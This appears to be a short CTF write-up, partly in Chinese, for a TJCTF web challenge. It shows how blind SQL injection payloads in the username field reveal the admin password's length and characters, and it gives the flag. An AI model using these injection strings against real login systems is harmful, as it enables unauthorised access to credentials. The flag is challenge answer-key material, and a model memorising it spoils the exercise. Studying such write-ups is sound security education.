Web, 50 Points
Auther: saisree
Writeup By: yctseng1227
It seems your login bypass skills are now famous! One of my friends has given you a challenge: figure out his password on this site. He's told me that his username is admin, and that his password is made of up only lowercase letters and numbers. (Wrap the password with tjctf{...})
從題目給定username
為admin
,以及從source code
可以看到SQL語法
以及一些欄位資訊,我們可以猜到這題要用Blind SQL injection,一些基本的猜法可以參考此篇。
How to Guess ?
透過SQL injection
並利用登入結果判斷是否成功,想辦法從username
撈出我們想要的資訊。
例如,猜password
長度:
admin' and length(password) > 13 --
--> success
admin' and length(password) > 14 --
--> fail
admin' and length(password) = 14 --
--> success
可以猜到password
長度為14。
又例如,猜password
第一個字元:
admin' and unicode(substr(password, 1)) > unicode('a') --
--> success
admin' and unicode(substr(password, 1)) > unicode('b') --
--> fail
admin' and unicode(substr(password, 1)) = unicode('b') --
--> success
可以猜到password
第一個字元為b
。
再來就是寫Code了,可以搭配Binary search加速搜尋~
然後用回傳的request長度判斷結果是否成功。
tjctf{blindsqli14519}